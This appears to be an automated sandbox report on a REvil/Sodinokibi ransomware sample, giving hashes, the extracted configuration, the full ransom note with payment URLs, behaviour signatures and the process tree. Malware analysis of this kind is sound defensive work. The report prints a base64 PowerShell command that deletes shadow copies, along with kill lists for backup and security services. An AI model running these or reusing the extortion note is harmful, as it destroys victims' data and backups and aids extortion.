Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-07-2024 09:49

General

  • Target

    2024-07-25_72d9db37db04e51f61fc7b3424a009d2_revil_wapomi.exe

  • Size

    139KB

  • MD5

    72d9db37db04e51f61fc7b3424a009d2

  • SHA1

    3be50ec5fced0b0f0e9f1795ecbafc7538f28426

  • SHA256

    ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae

  • SHA512

    be13842d7b615579714ac1dab4f43e11207075a4a3d09ec2aae2c87727ccdde2dece33c2394b20e0e669cd03f8c8f42924bf8d6cdaf1ab9489d9b555fb1a4281

  • SSDEEP

    1536:+DvcP3aXhpshwVs5OE8yNcYQpG2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOx9VG8:5lSVhaNcYMkgnBR5uiV1UvQFOxXGCH

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr

Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\ig792q8-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ig792q8. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D1DFB55CB49EFFB7 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/D1DFB55CB49EFFB7 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 1NOw06lKixgW118gQioNz7ML88YggB6vwB1IDCO4HyrJPtX4VTFI3DIPro5wyJ0Y wVLZ4m7D39SvHqZqRK7lhlBnm8KuCi4aFd0KY/9O9CvmsuzLf5Y11ZcJLzEU3sVC Mo8E+k/HLgFnjOZT8ezy8N4wPPF7mNETwzEoIfhTs5S6xs+LZw9QcJXXvLhW7+eV 2sOmVBb+i1dbc47CID84C5H+c07KQ/JoaF8lAzEv27L9uxYoX0QE7qW9pMUxlg5o MzTUkJzW5aVz1iQGEqgjQVxELiD2ZsCQDh2lWOZjYXyf+iF6y7XnK1OsnBppqEVW yHyAcuvgetASn5LM2CQZNCqSpAcZO7EXIPHN8m3MM4oDA4yrDa1JftTENLAn2oJi 4S1Qfzf4etQoZbkFlIQ6tMHtzBKR0GAZLU69Sr+dpvl/C++vCZsfjPZdDE0T5KIw 1sKsHUJeXJ66FW46cH3tv5DY/9Maxkh8THyUN/Xb2fDZUBYphnBwwM74bRMd/XgH QMbS7IYH5CR/MTNwyl0V97fk2fFisnV47XuKHEcBLeR5xidJRenZYYwAEyT7edVu nDtrH+k/6msSGv9p5vBEirR85HUdVtJRkNo+v+An9n3AseWlgZWNa4vFzolJxVCc 5ImfM3q1ZbLo0cUNRRMaYri2Wxu/wPDUaHlRBT6mnb4Je3p2VeYjjylk94etfdQU G73sAHc9Kpzxx8mfFNqHd3WkkLxibCunCPcDp6oDClLRM2ooWeUmpKnFRA8Y1YOy rfhNyEONDODgXFzcj0CghthBAIoh/FAHZHJrEHetUDXHUx9y7PRn2PglTpgrdmlu mU5WfKNQvbPHlPJB0sefTZpv/QjdH4QSiWHe5WyWz1SMNscksvuB7q75vsR16eww xa3mvaIOGY4+U/6tM++MkFWeO677iLWPxgNyt8erqiy3ZiTdyH/DigEevJ0zk/Fm t19dLMoBWBXH3no+/D956rWz1Xs+A26rQ2JZfH9Hlvu//yB39OFCS3L51oqlyndo jTI0ln4M0xgt8ZsbMPFcVxie6ky7qIw8JidvnEs3Lcmz3+Bqhq3bCCm2L1eeDgPQ c2tPCbIk/VGCsrbNrHUYuRc3nV4AHSr+x17aAl//JTepsbjpiAGnJz6KykfcvPFi DnKjREik7Hwbp+bpO3fLFJL9M/X4vX0z3eaCO9xoxu45LwGGf+fGiLAVqH7v/eFn xhzOz5T/9SCIrOsEM3pXVm0GVt9UL4jjB3pq75US0JZ01gDqsmDpg5m1lAlU7kBD Vvymv5kG12qwj0kgZG/3CEwyK2Kl6SvGyGTvygOwkbckpM2ZpQ5I+aPidueiFqpK IBW4WNp3hYp1O05Uno3BqLsMDniJtTNOgZyBnKHnGl6C5Tz8IOwN0g== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D1DFB55CB49EFFB7

http://decryptor.cc/D1DFB55CB49EFFB7

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-07-25_72d9db37db04e51f61fc7b3424a009d2_revil_wapomi.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-07-25_72d9db37db04e51f61fc7b3424a009d2_revil_wapomi.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4488
    • C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe
      C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3804
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\391e3967.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4332
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2528
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:4040
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3352

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MQYRE6E5\k2[1].rar

      Filesize

      4B

      MD5

      d3b07384d113edec49eaa6238ad5ff00

      SHA1

      f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

      SHA256

      b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

      SHA512

      0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

    • C:\Users\Admin\AppData\Local\Temp\24EF62BC.exe

      Filesize

      4B

      MD5

      20879c987e2f9a916e578386d499f629

      SHA1

      c7b33ddcc42361fdb847036fc07e880b81935d5d

      SHA256

      9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

      SHA512

      bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

    • C:\Users\Admin\AppData\Local\Temp\391e3967.bat

      Filesize

      187B

      MD5

      802dde0e0a152f758bad4ceb61796294

      SHA1

      34d7a9f7208d61240b6eeb9ca4b09453ec15aec0

      SHA256

      c5638410eeec922bb6de73c3c9df681d57ced28142d74c2d95099b28a8686926

      SHA512

      1ead086f72a1d89b59999d2b855ecb930365eb4da50b65e0abd375ea4d8fbfbea2ef8dd70676e690fec88a83fac8ebb1075fa4fb95f7e7114a215be28221ab50

    • C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe

      Filesize

      15KB

      MD5

      f7d21de5c4e81341eccd280c11ddcc9a

      SHA1

      d4e9ef10d7685d491583c6fa93ae5d9105d815bd

      SHA256

      4485df22c627fa0bb899d79aa6ff29bc5be1dbc3caa2b7a490809338d54b7794

      SHA512

      e4553b86b083996038bacfb979ad0b86f578f95185d8efac34a77f6cc73e491d4f70e1449bbc9eb1d62f430800c1574101b270e1cb0eeed43a83049a79b636a3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4epeliop.2bf.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\ig792q8-readme.txt

      Filesize

      6KB

      MD5

      afff785c4099b889560adb99b12aa859

      SHA1

      6ecb720ce1649838a593f33841fc6573d6b713e4

      SHA256

      9b9c87f576d74c9ebb104b091c2535802b69fa13babc2c5a86d0bbd0a35ec628

      SHA512

      c13f325e9aa5139e885ef5c931bafbb3096186aba3bbb03cb5f1983c8d389376028b511c99ca97e962672ff49e04e54fd266109b9eb08897ef2df11ae78027e9

    • memory/2528-35-0x00007FF9331D3000-0x00007FF9331D5000-memory.dmp

      Filesize

      8KB

    • memory/2528-36-0x000002B3ECA60000-0x000002B3ECA82000-memory.dmp

      Filesize

      136KB

    • memory/2528-46-0x00007FF9331D0000-0x00007FF933C91000-memory.dmp

      Filesize

      10.8MB

    • memory/2528-47-0x00007FF9331D0000-0x00007FF933C91000-memory.dmp

      Filesize

      10.8MB

    • memory/2528-62-0x00007FF9331D0000-0x00007FF933C91000-memory.dmp

      Filesize

      10.8MB

    • memory/3804-58-0x0000000000AE0000-0x0000000000AE9000-memory.dmp

      Filesize

      36KB

    • memory/3804-5-0x0000000000AE0000-0x0000000000AE9000-memory.dmp

      Filesize

      36KB

    • memory/4488-0-0x0000000000C40000-0x0000000000C67000-memory.dmp

      Filesize

      156KB

    • memory/4488-506-0x0000000000C40000-0x0000000000C67000-memory.dmp

      Filesize

      156KB